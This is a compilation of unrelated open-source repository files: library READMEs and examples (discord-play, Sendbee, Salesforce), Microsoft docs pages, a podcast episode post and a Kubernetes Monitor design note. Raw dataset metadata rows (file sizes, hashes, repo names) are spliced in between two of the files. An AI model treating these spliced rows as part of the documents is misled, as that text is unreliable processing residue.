File: examples/basic_player/ts_example.md (repo: tr1ckydev/discord-play, license: MIT)

```tsx
import { Client, Intents, Message } from 'discord.js';
import { DisPlayConnection, DisPlayEvent, DisPlayPlayer } from 'discord-play';
const client: Client = new Client({
intents: [
Intents.FLAGS.GUILDS,
Intents.FLAGS.GUILD_MESSAGES,
Intents.FLAGS.GUILD_VOICE_STATES
]
});
client.once('ready', () => console.log('Ready!'));
interface Command {
name: string,
args: string[]
}
let connection: DisPlayConnection, player: DisPlayPlayer;
client.on('messageCreate', async (message: Message) => {
const command: Command = parseCommand(message.content);
switch (command.name) {
case "?join": {
if (connection) { message.reply("Already joined a voice channel."); return; }
connection = new DisPlayConnection(message.member.voice);
player = new DisPlayPlayer(message.guild.id);
player.on(DisPlayEvent.BUFFERING, (oldState, newState) => {
message.channel.send("Loading resource");
});
player.on(DisPlayEvent.PLAYING, (oldState, newState) => {
message.channel.send("Started playing");
});
player.on(DisPlayEvent.FINISH, (oldState, newState) => {
message.channel.send("Finished playing");
});
player.on('error', error => {
message.channel.send("Error");
console.log(error);
});
break;
}
    case "?play": {
      if (!player) { message.reply("Join a voice channel first using ?join."); return; }
      player.play('./sample.mp3');
/* You can also pass an online audio link too.
* `player.play(command.args[0]);`
* (e.g. `?play www.sample.com/media/audio.mp3`)
*
      * There is currently an issue with ffmpeg-static where ONLY
      * online audio links cannot be played; everything else works fine.
      * If you really want to play online audio links,
      * install the original `ffmpeg` globally on your system instead
      * of the static version.
*/
break;
}
case "?mute": {
if (!connection) { message.reply("No connection found"); return; }
await connection.toggleMute();
message.reply("Mute toggled");
break;
}
case "?deafen": {
if (!connection) { message.reply("No connection found"); return; }
await connection.toggleDeafen();
message.channel.send("Deafen toggled.");
break;
}
case "?leave": {
if (!connection) { message.reply("No connection found"); return; }
try {
await connection.destroy();
message.reply("Left voice channel");
} catch {
message.channel.send("No connection found");
}
break;
}
    case "?getreport": {
      if (!connection) { message.reply("No connection found"); return; }
      message.reply(`\`\`\`js
      ${connection.getDependancies()}
      \`\`\``);
      // Returns the ffmpeg version along with the other dependencies.
    }
}
});
client.login("your-bot-token-here");
function parseCommand(content: string): Command {
const args: string[] = content.split(' ');
const name: string = args.shift();
return { name, args };
}
```
File: Exchange/ExchangeServer2013/remove-an-outlook-protection-rule-exchange-2013-help.md (repo: M34U2NV/OfficeDocs-Exchange, licenses: CC-BY-4.0, MIT)

---
title: 'Remove an Outlook Protection Rule: Exchange 2013 Help'
TOCTitle: Remove an Outlook Protection Rule
ms:assetid: 569fc3be-b269-43f5-8797-73ab0691e685
ms:mtpsurl: https://technet.microsoft.com/library/Ee633467(v=EXCHG.150)
ms:contentKeyID: 49319914
ms.reviewer:
manager: serdars
ms.author: dmaguire
author: msdmaguire
f1.keywords:
- NOCSH
mtps_version: v=EXCHG.150
---
# Remove an Outlook Protection Rule
_**Applies to:** Exchange Server 2013_
Using Microsoft Outlook protection rules, you can protect messages with Information Rights Management (IRM) by applying an [Active Directory Rights Management Services (AD RMS)](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh831364(v=ws.11)) template in Outlook 2010 before the messages are sent. To prevent an Outlook protection rule from being applied, you can disable the rule. Removing an Outlook protection rule removes the rule definition from Active Directory.
For additional management tasks related to IRM, see [Information Rights Management procedures](information-rights-management-procedures-exchange-2013-help.md).
## What do you need to know before you begin?
- Estimated time to completion: 1 minute.
- You need to be assigned permissions before you can perform this procedure or procedures. To see what permissions you need, see the "Rights protection" entry in the [Messaging policy and compliance permissions](messaging-policy-and-compliance-permissions-exchange-2013-help.md) topic.
- You can't use the Exchange admin center (EAC) to remove Outlook protection rules. You must use the Shell.
- For information about keyboard shortcuts that may apply to the procedures in this topic, see [Keyboard shortcuts in the Exchange admin center](keyboard-shortcuts-in-the-exchange-admin-center-2013-help.md).
> [!TIP]
> Having problems? Ask for help in the Exchange forums. Visit the forums at [Exchange Server](https://social.technet.microsoft.com/forums/office/home?category=exchangeserver).
## Use the Shell to remove an Outlook protection rule
This example removes the Outlook protection rule OPR-DG-Finance.
```powershell
Remove-OutlookProtectionRule -Identity "OPR-DG-Finance"
```
For detailed syntax and parameter information, see [Remove-OutlookProtectionRule](/powershell/module/exchange/Remove-OutlookProtectionRule).
## Use the Shell to remove all Outlook protection rules
This example removes all Outlook protection rules in the Exchange organization.
```powershell
Get-OutlookProtectionRule | Remove-OutlookProtectionRule
```
For detailed syntax and parameter information, see [Get-OutlookProtectionRule](/powershell/module/exchange/Get-OutlookProtectionRule) and [Remove-OutlookProtectionRule](/powershell/module/exchange/Remove-OutlookProtectionRule).
## How do you know this worked?
To verify that you have successfully removed an Outlook protection rule, use the [Get-OutlookProtectionRule](/powershell/module/exchange/Get-OutlookProtectionRule) cmdlet to retrieve Outlook protection rules. For an example of how to retrieve Outlook protection rules, see [Examples](/powershell/module/exchange/Get-OutlookProtectionRule#examples).

File: sfdc37/tests/Readme.md (repo: pramodya1994/module-salesforce, license: Apache-2.0)

## Compatibility
| Ballerina Version | API Version |
| ------------------ | ------------ |
| 0.991.0 | v37.0 |
### Prerequisites
Create a Salesforce developer account and create a connected app by visiting [Salesforce](https://www.salesforce.com) and obtain the following parameters:
* Base URl (Endpoint)
* Client Id
* Client Secret
* Access Token
* Refresh Token
* Refresh URL
IMPORTANT: This access token and refresh token can be used to make API requests on your own account's behalf.
Do not share your access token or client secret with anyone.
Create an external ID field under the "Account" SObject, named `"SF_ExternalID__c"`, in your connected app.
This field will be used in the test cases related to the external ID.
Visit [here](https://help.salesforce.com/articleView?id=remoteaccess_authenticate_overview.htm) for more information on obtaining OAuth2 credentials.
### Working with Salesforce REST endpoint.
In order to use the Salesforce endpoint, first you need to create a
Salesforce Client endpoint by passing above mentioned parameters.
The following example shows how to create the Salesforce endpoint.
```ballerina
sfdc37:SalesforceConfiguration salesforceConfig = {
baseUrl: endpointUrl,
clientConfig: {
auth: {
scheme: http:OAUTH2,
config: {
grantType: http:DIRECT_TOKEN,
config: {
accessToken: accessToken,
refreshConfig: {
refreshUrl: refreshUrl,
refreshToken: refreshToken,
clientId: clientId,
clientSecret: clientSecret
}
}
}
}
}
};
sfdc37:Client salesforceClient = new(salesforceConfig);
```
#### Running salesforce tests
Create `ballerina.conf` file in `module-salesforce`, with following keys:
* ENDPOINT
* ACCESS_TOKEN
* CLIENT_ID
* CLIENT_SECRET
* REFRESH_TOKEN
* REFRESH_URL
Assign relevant string values generated for Salesforce app.
Go inside `module-salesforce`, run the `ballerina init` command from the terminal, and then run the test.bal file
using the `ballerina test sfdc37 --config ballerina.conf` command.
* Sample Test Function
```ballerina
@test:Config
function testGetResourcesByApiVersion() {
log:printInfo("salesforceClient -> getResourcesByApiVersion()");
string apiVersion = "v37.0";
json|SalesforceConnectorError response = salesforceClient->getResourcesByApiVersion(apiVersion);
if (response is json) {
test:assertNotEquals(response, null, msg = "Found null JSON response!");
test:assertNotEquals(response["sobjects"], null);
test:assertNotEquals(response["search"], null);
test:assertNotEquals(response["query"], null);
test:assertNotEquals(response["licensing"], null);
test:assertNotEquals(response["connect"], null);
test:assertNotEquals(response["tooling"], null);
test:assertNotEquals(response["chatter"], null);
test:assertNotEquals(response["recent"], null);
} else {
test:assertFail(msg = response.message);
}
}
```
* Sample Result
```ballerina
---------------------------------------------------------------------------
T E S T S
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Running Tests of module: sfdc37
---------------------------------------------------------------------------
...
2018-04-13 13:35:19,154 INFO [sfdc37] - salesforceClient -> getResourcesByApiVersion()
...
sfdc37............................................................. SUCCESS
---------------------------------------------------------------------------
```
File: README.md (repo: sendbee/sendbee-python-client, license: MIT)

# Sendbee Python API Client
```
.' '. __
. . . (__\_
. . . -{{_(|8)
' . . ' ' . . ' (__/
```
[](https://badge.fury.io/py/sendbee-api)
[](https://travis-ci.org/sendbee/sendbee-python-api-client)






## Table of contents
- [Installation](#installation)
- [Initialization](#initialization)
#### Contacts
- [Fetch contacts](#fetch-contacts)
- [Subscribe contact](#subscribe-contact)
- [Update contact](#update-contact)
#### Contact Tags
- [Fetch contact tags](#fetch-contact-tags)
- [Create contact tag](#create-contact-tag)
- [Update contact tag](#update-contact-tag)
- [Delete contact tag](#delete-contact-tag)
#### Contact Fields
- [Fetch contact fields](#fetch-contact-fields)
- [Create contact field](#create-contact-field)
- [Update contact field](#update-contact-field)
- [Delete contact field](#delete-contact-field)
#### Conversations
- [Fetch conversations](#fetch-conversations)
- [Fetch conversation messages](#fetch-conversation-messages)
- [Fetch message templates](#fetch-message-templates)
- [Send template message](#send-template-message)
- [Send message](#send-message)
#### Teams
- [Fetch teams](#fetch-teams)
- [Fetch team members](#fetch-team-members)
#### Automation
- [Managing chatbot (automated responses) status settings](#bot-on-off)
- [Get chatbot (automated responses) status](#bot-status)
#### Misc
- [Pagination](#pagination)
- [API Rate Limit](#api-rate-limit)
- [Raw response](#raw-response)
- [Exception handling](#exception-handling)
- [Authenticate webhook request](#authenticate-webhook-request)
- [Warnings](#warnings)
- [Debugging](#debugging)
- [Official Documentation](http://developer.sendbee.io)
### <a href='#installation'>Installation</a>
```bash
> pip install sendbee-api
```
### <a href='#initialization'>Initialization</a>
```python
from sendbee_api import SendbeeApi
api = SendbeeApi('__your_api_key_here__', '__your_secret_key_here__')
```
## Contacts
### <a href='#fetch-contacts'>Fetch contacts</a>
```python
contacts = api.contacts(
[tags=['...', ...]], [status='subscribed|unsubscribed'],
[search_query='...'], [page=...], [limit=...]
)
for contact in contacts:
contact.id
contact.status
contact.folder
contact.created_at
contact.name
contact.phone
for tag in contact.tags:
tag.id
tag.name
for note in contact.notes:
note.value
for contact_field in contact.contact_fields:
contact_field.key
contact_field.value
```
### <a href='#subscribe-contact'>Subscribe contact</a>
```python
contact = api.subscribe_contact(
phone='+...',
    # this is mandatory and the most important information
# about the subscribing contact
[tags=['...', ...]],
# tag new contact
# if tag doesn't exist, it will be created
[name='...'],
[notes=[...]],
# write notes about your new subscriber
[contact_fields={'__field_name__': '__field_value__', ...}],
# fill contact fields with your data (value part)
# contact fields must be pre-created in Sendbee Dashboard
# any non-existent field will be ignored
[block_notifications=[True|False]],
# prevent sending browser push notification and email
# notification to agents, when new contact subscribes
# (default is True)
[block_automation=[True|False]]
# prevent sending automated template messages to newly
# subscribed contact (if any is set in Sendbee Dashboard)
# (default is True)
)
contact.id
contact.status
contact.folder
contact.created_at
contact.name
contact.phone
for tag in contact.tags:
tag.id
tag.name
for note in contact.notes:
note.value
for contact_field in contact.contact_fields:
contact_field.key
contact_field.value
```
### <a href='#update-contact'>Update contact</a>
```python
contact = api.update_contact(
id='...',
# contact is identified with ID
[phone='+...'],
# this is the most important information
# about the subscribing contact
[tags=['...', ...]],
# tag new contact
# if tag doesn't exist, it will be created
[name='...'],
[notes=[...]],
# write notes about your new subscriber
# if there are notes already saved for this contact
# new notes will be appended
[contact_fields={'__field_name__': '__field_value__', ...}],
# fill contact fields with your data (value part)
# contact fields must be pre-created in Sendbee Dashboard
# any non-existent field will be ignored
# if there are fields already filled with data for this contact
# it will be overwritten with new data
)
contact.id
contact.status
contact.folder
contact.created_at
contact.name
contact.phone
for tag in contact.tags:
tag.id
tag.name
for note in contact.notes:
note.value
for contact_field in contact.contact_fields:
contact_field.key
contact_field.value
```
## Contact tags
### <a href='#fetch-contact-tags'>Fetch contact tags</a>
```python
tags = api.tags([name='...'], [page=...], [limit=...])
for tag in tags:
tag.id
tag.name
```
### <a href='#create-contact-tag'>Create contact tag</a>
```python
tag = api.create_tag(name='...')
tag.id
tag.name
```
### <a href='#update-contact-tag'>Update contact tag</a>
```python
tag = api.update_tag(id='...', name='...')
tag.id
tag.name
```
### <a href='#delete-contact-tag'>Delete contact tag</a>
```python
response = api.delete_tag(id='...')
response.message
```
## Contact fields
### <a href='#fetch-contact-fields'>Fetch contact fields</a>
```python
contact_fields = api.contact_fields([search_query='...'], [page=...], [limit=...])
for contact_field in contact_fields:
contact_field.name
contact_field.type
if contact_field.type == 'list':
contact_field.options
```
### <a href='#create-contact-field'>Create contact field</a>
If a contact field type is a list, then you need to send the list options.
List options are a list of option names: `['option1', 'option2', ...]`
```python
contact_field = api.create_contact_field(
name='...', type='text|number|list|date|boolean',
[options=['...'. ...]] # if contact field type is list
)
contact_field.id
contact_field.name
contact_field.type
if contact_field.type == 'list':
contact_field.options
```
### <a href='#update-contact-field'>Update contact field</a>
If a contact field type is a list, then you need to send the list options.
List options are a list of option names: `['option1', 'option2', ...]`
```python
contact_field = api.update_contact_field(
id='...', [name='...'], [type='text|number|list|date|boolean'],
[options=['...'. ...]] # if contact field type is list
)
contact_field.id
contact_field.name
contact_field.type
if contact_field.type == 'list':
contact_field.options
```
### <a href='#delete-contact-field'>Delete contact field</a>
```python
response = api.delete_contact_field(id='...')
response.message
```
## Conversations
### <a href='#fetch-conversations'>Fetch conversations</a>
```python
conversations = api.conversations(
[folder='open|done|spam|notified'], [search_query='...'],
[page=...], [limit=...], [date_from=__timestamp__], [date_to=__timestamp__]
)
for conversation in conversations:
conversation.id
conversation.folder
conversation.chatbot_active
conversation.platform
conversation.created_at
conversation.contact.id
conversation.contact.name
conversation.contact.phone
conversation.last_message.direction
conversation.last_message.status
conversation.last_message.inbound_sent_at
conversation.last_message.outbound_sent_at
```
### <a href='#fetch-conversation-messages'>Fetch conversation messages</a>
```python
messages = api.messages(conversation_id='...', [page=...])
for message in messages:
message.body
message.media_type
message.media_url
message.status
message.direction
message.sent_at
```
### <a href='#fetch-message-templates'>Fetch message templates</a>
Message templates must first be sent for approval.
Therefore, every message template can have one of the following statuses: `pending`, `approved`, `rejected`.
If a message template comes with `rejected` status, it also comes with a `rejected_reason`.
```python
templates = api.message_templates(
[status="pending|approved|rejected"], [search_query='...'],
[page=...], [limit=...]
)
for template in templates:
template.id
template.text
template.buttons # available for all Sendbee users onboarded after 11th of December 2020
template.button_tags # available for all Sendbee users onboarded after 11th of December 2020
template.tags
template.keyword
template.language
template.status
template.rejected_reason
```
### <a href='#send-template-message'>Send template message</a>
A message template can be purely textual, or textual with an attachment.
If it is with an attachment, that means you can send an image, video, or document URL together with the text.
When you get a list of message templates, every template in that list has an `attachment` field with its value.
The attachment field value defines which type of attachment can be sent with the message template:
Value | Description
--------- | -------
image | Message template can be sent with image URL: JPG/JPEG, PNG
video | Message template can be sent with video URL: MP4, 3GPP
document | Message template can be sent with document URL: PDF, DOC, DOCX, PPT, PPTX, XLS, XLSX
null | Message template does not support attachment URL
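Before calling the API, a client-side check against this table can catch obvious mismatches. A minimal sketch (the helper name and the extension sets are our own assumptions derived from the formats listed above; they are not part of the Sendbee client):

```python
import os

# Assumed mapping from attachment type to allowed file extensions,
# based on the format table above.
ALLOWED_EXTENSIONS = {
    'image': {'.jpg', '.jpeg', '.png'},
    'video': {'.mp4', '.3gpp'},
    'document': {'.pdf', '.doc', '.docx', '.ppt', '.pptx', '.xls', '.xlsx'},
}

def attachment_allowed(attachment_type, url):
    """Check whether an attachment URL matches a template's attachment type."""
    if attachment_type is None:
        return False  # template does not support attachment URLs
    # Drop any query string, then compare the lower-cased extension.
    ext = os.path.splitext(url.split('?', 1)[0].lower())[1]
    return ext in ALLOWED_EXTENSIONS.get(attachment_type, set())
```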
```python
response = api.send_template_message(
phone='+...',
template_keyword='...',
# every pre-created and approved message template
# is identified with a keyword
language='...',
# language keyword
# example: en (for english)
tags={'__tag_key__': '__tag_value__', ...},
# tags for template messages are parts of the message that need
# to be filled with your custom data
# example:
# template message: "Welcome {{1}}! How can we help you?"
# tags: {"1": "John"}
# Learn more: https://developer.sendbee.io/#send-message-template
button_tags={'__tag_key__': '__tag_value__', ...}
# tags for call-to-action button with dynamic URL suffix that need
# to be filled with your custom data
# example:
# template message: https://example.com/{{1}}
# tags: {"1": "page/123"}
[prevent_bot_off=True|False],
# if set to True, will prevent turning-off chatbot for the conversation
# default system behaviour is that chatbot is turned-off
[attachment='http...']
)
response.status
response.conversation_id
response.message_id
# save this id, and when you get sent message status requests on
# your webhook, you'll get this same id to identify the conversation
```
### <a href='#send-message'>Send message</a>
You can send either a text message or a media message.
For media messages, the following formats are supported:
Category | Formats
-------- | -------
Audio | AAC, M4A, AMR, MP3, OGG OPUS
Video | MP4, 3GPP
Image | JPG/JPEG, PNG
Document | PDF, DOC, DOCX, PPT, PPTX, XLS, XLSX
```python
response = api.send_message(
phone='+...',
[text='...'],
# any kind of message text
[media_url='...'],
# URL to a media.
# you need to upload it your self and send us the URL
[prevent_bot_off=True|False]
# if set to True, will prevent turning-off chatbot for the conversation
# default system behaviour is that chatbot is turned-off
)
response.status
response.conversation_id
response.message_id
# save this id, and when you get sent message status requests on
# your webhook, you'll get this same id to identify the conversation
```
## Teams
### <a href='#fetch-teams'>Fetch teams</a>
```python
teams = api.teams([member_id='...'])
for team in teams:
team.id
team.name
for member in team.members:
member.id
member.name
member.role
member.online
member.available
```
### <a href='#fetch-team-members'>Fetch team members</a>
```python
members = api.members([team_id='...'])
for member in members:
member.id
member.name
member.role
member.online
member.available
for team in member.teams:
team.id
team.name
```
## Automation
### <a href='#bot-on-off'>Managing chatbot (automated responses) status settings</a>
Every contact is linked to a conversation with an agent.
Conversation could be handled by an agent or a chatbot (automated responses).
Every time a message has been sent to a contact by an agent or using the API,
the chatbot will automatically be turned off for that conversation -
except when you set 'prevent_bot_off' to true via API call (see [Send message](#send-message)).
Use the example below to change the chatbot status based on your use case.
```python
api.chatbot_activity(conversation_id='...', active=True|False)
```
### <a href='#bot-status'>Get chatbot (automated responses) status</a>
You can also check if chatbot is turned on or off for a conversation.
```python
response = api.chatbot_activity_status(conversation_id='...')
response.conversation_id
response.chatbot_active # True/False
```
## Misc
### <a href='#pagination'>Pagination</a>
You can paginate on every endpoint/method where a list of items is fetched.
Wherever you see `[page=...]`, it means you can paginate like `page=2`, `page=3`, etc. The best way to do that is to use the `.next_page()` method.
There are two ways to detect that pagination has ended: using `PaginationException` and using the `.has_next()` method.
> Paginate using .next_page() and PaginationException:
```python
from sendbee_api import PaginationException
messages = api.messages(conversation_id='...') # first page
while True:
try:
messages = api.messages(
conversation_id='...', page=messages.next_page()
)
except PaginationException as e:
break
```
> Paginate using .next_page() and .has_next() methods:
```python
messages = api.messages(conversation_id='...') # first page
while True:
if not messages.has_next():
break
messages = api.messages(
conversation_id='...', page=messages.next_page()
)
```
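Both patterns can be folded into a small generator that hides paging entirely (a sketch: `iter_all_pages` and `fetch` are our own names, not part of the client; `fetch` stands for any paginated method such as `lambda p: api.messages(conversation_id='...', page=p)`):

```python
def iter_all_pages(fetch):
    """Yield every item from a paginated Sendbee endpoint, page by page."""
    page = 1
    while True:
        results = fetch(page)
        for item in results:
            yield item
        if not results.has_next():
            break
        page = results.next_page()
```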
### <a href='#api-rate-limit'>API Rate Limit</a>
A rate limit is the number of API calls a business number can make
within a given time period. If this limit is exceeded,
API requests are throttled, and will fail with a 429 error response.
No matter how many API keys you create in your Sendbee account,
the rate limit will always be counted per business number.
```python
from sendbee_api import SendbeeRequestApiException
try:
api.rate_limit_request_test()
except SendbeeRequestApiException as ex:
retry_after = ex.response.headers.get('Retry-After')
```
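A common pattern is to honor the `Retry-After` header and retry the call. A minimal sketch (the helper and its parameter names are ours, not part of the client; the exception class is passed in so the sketch stays dependency-free, and a default delay is used when the header is missing):

```python
import time

def call_with_retry(call, *args, throttled_exc=Exception,
                    max_retries=3, default_delay=1.0, **kwargs):
    """Retry an API call that fails with a throttling error (HTTP 429)."""
    for _ in range(max_retries):
        try:
            return call(*args, **kwargs)
        except throttled_exc as ex:
            # Read Retry-After defensively; the exception may not carry it.
            response = getattr(ex, 'response', None)
            headers = getattr(response, 'headers', None) or {}
            retry_after = headers.get('Retry-After')
            time.sleep(float(retry_after) if retry_after else default_delay)
    return call(*args, **kwargs)  # final attempt: let any exception propagate
```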
### <a href='#raw-response'>Raw response</a>
If you prefer to deal with the raw server response, the response string is available under `raw_data`:
```python
from sendbee_api import SendbeeApi
api = SendbeeApi('__your_api_key_here__', '__your_secret_key_here__')
response = api.contacts()
print(response.raw_data)
```
### <a href='#exception-handling'>Exception handling</a>
Every time something is not as it should be (a parameter is missing, a parameter value is invalid, authentication fails, etc.), the API returns an appropriate HTTP status code and an error message.
By using this client library, the error message is detected and extracted, and an exception is raised, so you can handle it like this:
```python
from sendbee_api import SendbeeRequestApiException
try:
api.send_template_message(...)
except SendbeeRequestApiException as e:
# handle exception
```
### <a href='#authenticate-webhook-request'>Authenticate webhook request</a>
After activating your webhook URL in Sendbee Dashboard, we will start sending requests on that URL depending on which webhook type is linked with that webhook URL.
Every request that we make will have an authorization token in its header, like this:
```
{
...
'X-Authorization': '__auth_token_here__',
...
}
```
To authenticate requests that we make to your webhook URL, take this token from the request header and check it using the Sendbee API Client:
```python
from sendbee_api import SendbeeApi
api = SendbeeApi('__your_api_key_here__', '__your_secret_key_here__')
token = '...' # taken from the request header
if not api.auth.check_auth_token(token):
# error! authentication failed!
```
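In a web application, this check usually runs at the top of the webhook handler. A framework-agnostic sketch (the helper name is ours; `headers` is whatever mapping your framework exposes for request headers):

```python
def authenticate_webhook(api, headers):
    """Return True when the webhook request carries a valid Sendbee token."""
    token = headers.get('X-Authorization', '')
    return bool(token) and api.auth.check_auth_token(token)
```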
### <a href='#warnings'>Warnings</a>
Sometimes the API returns a warning so you can be warned about something.
The warning is displayed in standard output:

### <a href='#debugging'>Debugging</a>
This library has its own internal debugging tool.
By default it is disabled, and to enable it, pass the `debug` parameter:
```python
from sendbee_api import SendbeeApi
api = SendbeeApi(
'__your_api_key_here__', '__your_secret_key_here__', debug=True
)
```
Once you have enabled the internal debug tool, every request to the API will output various request and response data in standard output:

File: README.md (repo: BrianLiterachu/mafia-clone, license: 0BSD)

# Mafia Bot - Clone File
An open-source moderation and action bot written in JavaScript
# Requirements
__NodeJS__
*__Windows: https://nodejs.org/en/download__*
# Start
```
Step 1: Download the repository
Step 1.2: Replace process.env.token with your Discord Bot Token
Step 2: Go to the Command Prompt for Windows
cd /Path/To/The Repository
Step 3: Install all the dependencies
npm install
The final step: Run the bot
node index.js
```
# About Us
# * Owner:
```
TwitchyJam (Christensen)
[NTU] Shieru
```
# * Contributor, Support:
```
JustAPie
Monsieur Andy (Ishigami Kaito)
```
File: ml/src/main/scala/com/github/cloudml/zen/ml/recommendation/README.md (repo: titsuki/zen, license: Apache-2.0)

# Factorization Machines
## Road map
* Support hundreds of billions of features
* Support online learning
* Support TBs of training data
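For context, the model behind this roadmap: a second-order factorization machine scores a feature vector x as a linear part plus pairwise interactions whose weights are factorized through k-dimensional latent vectors v_i:

```latex
\hat{y}(\mathbf{x}) \;=\; w_0 \;+\; \sum_{i=1}^{n} w_i x_i
\;+\; \sum_{i=1}^{n} \sum_{j=i+1}^{n} \langle \mathbf{v}_i, \mathbf{v}_j \rangle \, x_i x_j
```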
File: docs/framework/wcf/diagnostics/tracing/microsoft-transactions-transactionbridge-createtransactionfailure.md (repo: yunuskorkmaz/docs.tr-tr, licenses: CC-BY-4.0, MIT)

---
description: 'Learn more about: Microsoft.Transactions.TransactionBridge.CreateTransactionFailure'
title: Microsoft.Transactions.TransactionBridge.CreateTransactionFailure
ms.date: 03/30/2017
ms.assetid: c3468e23-49a9-4a84-972d-a79a658851b3
ms.openlocfilehash: 6b4a071b617de475b51ec50178e5205fa2e524d2
ms.sourcegitcommit: ddf7edb67715a5b9a45e3dd44536dabc153c1de0
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 02/06/2021
ms.locfileid: "99803314"
---
# <a name="microsofttransactionstransactionbridgecreatetransactionfailure"></a>Microsoft.Transactions.TransactionBridge.CreateTransactionFailure
The transaction could not be created.
## <a name="description"></a>Description
This trace is generated when MSDTC fails to create a transaction. This can be caused by low resources, insufficient log space, or other errors.
## <a name="troubleshooting"></a>Troubleshooting
Examine the status string in the trace message to determine whether any actionable items exist.
## <a name="see-also"></a>See also
- [Tracing](index.md)
- [Using Tracing to Troubleshoot Your Application](using-tracing-to-troubleshoot-your-application.md)
- [Administration and Diagnostics](../index.md)
| 41.3 | 151 | 0.807103 | tur_Latn | 0.978504 |
61b562e93aef853af58796f999e55efce93854d9 | 1,198 | md | Markdown | hugo/content/posts/podcast-140.md | zsxoff/radio-t-site | 08e1f661086e6ba8dd42fa6a310a1983eb48373b | [
"MIT"
] | 96 | 2018-04-06T19:42:00.000Z | 2022-03-20T10:54:51.000Z | hugo/content/posts/podcast-140.md | zsxoff/radio-t-site | 08e1f661086e6ba8dd42fa6a310a1983eb48373b | [
"MIT"
] | 140 | 2018-04-06T18:36:48.000Z | 2022-02-26T10:47:15.000Z | hugo/content/posts/podcast-140.md | zsxoff/radio-t-site | 08e1f661086e6ba8dd42fa6a310a1983eb48373b | [
"MIT"
] | 94 | 2018-04-07T16:35:54.000Z | 2022-03-26T22:51:05.000Z | +++
title = "Радио-Т 140"
date = "2009-06-14T08:00:00"
categories = [ "podcast",]
filename = "rt_podcast140"
image = "https://radio-t.com/images/radio-t/rt140.jpg"
+++

- Release of the brilliant [Fedora 11](http://www.engadget.com/2009/06/09/fedora-11-packs-a-next-gen-file-system-faster-boot-times-all-t/)
- A celebration of file systems in the new [2.6.30](http://www.linux.org.ru/view-message.jsp?msgid=3775397)
- The new [iPhone](http://macradar.ru/events/wwdc-2009-iphone/) is as good as the old one
- The [notebook](http://macradar.ru/events/wwdc-2009-macbook-pro/) lineup is almost unchanged
- [Snow Leopard](http://macradar.ru/events/wwdc-2009-1/) has not leaped yet
- Google will do [Exchange](http://www.infoq.com/news/2009/06/Google-App-Outlook-Plug-in) without Exchange
- [WordPress 2.8](http://habrahabr.ru/blogs/wordpress/61850/) is already here
- The end of [analog](http://culture.compulenta.ru/432636/) TV in one particular country
- [Yandex](http://internetno.net/2009/06/10/narod/) turns to face the "narod" (people)
[Audio](https://archive.rucast.net/radio-t/media/rt_podcast140.mp3)
<audio src="https://archive.rucast.net/radio-t/media/rt_podcast140.mp3" preload="none"></audio>
| 49.916667 | 136 | 0.732053 | yue_Hant | 0.083003 |
61b57d00f9eba5e9673cec08d879b536694da938 | 239 | md | Markdown | src/__tests__/fixtures/unfoldingWord/en_tq/hab/03/13.md | unfoldingWord/content-checker | 7b4ca10b94b834d2795ec46c243318089cc9110e | [
"MIT"
] | null | null | null | src/__tests__/fixtures/unfoldingWord/en_tq/hab/03/13.md | unfoldingWord/content-checker | 7b4ca10b94b834d2795ec46c243318089cc9110e | [
"MIT"
] | 226 | 2020-09-09T21:56:14.000Z | 2022-03-26T18:09:53.000Z | src/__tests__/fixtures/unfoldingWord/en_tq/hab/03/13.md | unfoldingWord/content-checker | 7b4ca10b94b834d2795ec46c243318089cc9110e | [
"MIT"
] | 1 | 2022-01-10T21:47:07.000Z | 2022-01-10T21:47:07.000Z | # Why did Yahweh go forth in his indignation?
Yahweh went forth in his indignation for the salvation of his people and his anointed one.
# Who does Yahweh shatter in his indignation?
Yahweh shatters the head of the house of the wicked.
| 29.875 | 90 | 0.782427 | eng_Latn | 0.999932 |
61b64ff8a470ffb7733dfc4a26587a2ef2d1cf59 | 900 | md | Markdown | docs/design/monitor.md | jelmersnoeck/ingress-monitor | aa9efbe279c008f60aed08e95cf8432f12541bd6 | [
"MIT"
] | 7 | 2018-10-03T04:59:51.000Z | 2020-09-07T10:02:51.000Z | docs/design/monitor.md | jelmersnoeck/ingress-monitor | aa9efbe279c008f60aed08e95cf8432f12541bd6 | [
"MIT"
] | 25 | 2018-08-29T07:08:06.000Z | 2019-03-24T17:48:29.000Z | docs/design/monitor.md | jelmersnoeck/ingress-monitor | aa9efbe279c008f60aed08e95cf8432f12541bd6 | [
"MIT"
] | 2 | 2018-10-02T16:36:01.000Z | 2019-01-18T13:52:40.000Z | # Monitor
A Monitor is fairly simple, as its aim is to combine configuration objects into
a single object.
A Monitor is namespace-bound: the namespace you deploy it in is where it takes
effect. It won't select Ingresses from outside that namespace.
```yaml
# A Monitor is the glue between a MonitorTemplate, Provider and a set of
# Ingresses.
apiVersion: ingressmonitor.sphc.io/v1alpha1
kind: Monitor
metadata:
name: go-apps
namespace: websites
spec:
# Required. The Operator will fetch all Ingresses that have the given labels
# set up for the namespace this IngressMonitor lives in.
selector:
labels:
component: marketplace
# Provider is the provider we'd like to use for this Monitor.
provider:
name: prod-statuscake
# Template is the reference to the MonitorTemplate we'd like to use for this
# Monitor.
template:
name: go-apps
```
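The `selector.labels` matching above presumably follows standard Kubernetes label-selector semantics (an assumption — the document doesn't spell it out): a Monitor matches an Ingress in its namespace when every selector label is present on the Ingress with the same value. A minimal sketch:

```python
def selector_matches(selector_labels, ingress_labels):
    """Illustrative sketch of Kubernetes-style equality label matching.

    Returns True when every key/value pair in the selector is present
    on the Ingress's labels. An empty selector matches everything.
    """
    return all(ingress_labels.get(k) == v for k, v in selector_labels.items())

selector = {"component": "marketplace"}
print(selector_matches(selector, {"component": "marketplace", "app": "shop"}))  # → True
print(selector_matches(selector, {"component": "api"}))                         # → False
```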
| 28.125 | 79 | 0.75 | eng_Latn | 0.999123 |
61b6c7adc9a6306b68fc85f6629459db35d9ae8b | 19,413 | md | Markdown | README.md | duytruong27/flutter-unity-view-widget | 980a435dce6f19c4a068d461a05ee687d402bd11 | [
"MIT"
] | 6 | 2020-08-12T08:56:54.000Z | 2021-06-18T07:33:47.000Z | README.md | duytruong27/flutter-unity-view-widget | 980a435dce6f19c4a068d461a05ee687d402bd11 | [
"MIT"
] | null | null | null | README.md | duytruong27/flutter-unity-view-widget | 980a435dce6f19c4a068d461a05ee687d402bd11 | [
"MIT"
] | 1 | 2020-05-18T15:03:37.000Z | 2020-05-18T15:03:37.000Z | # flutter_unity_widget
[](#contributors-)
[![version][version-badge]][package]
[![MIT License][license-badge]][license]
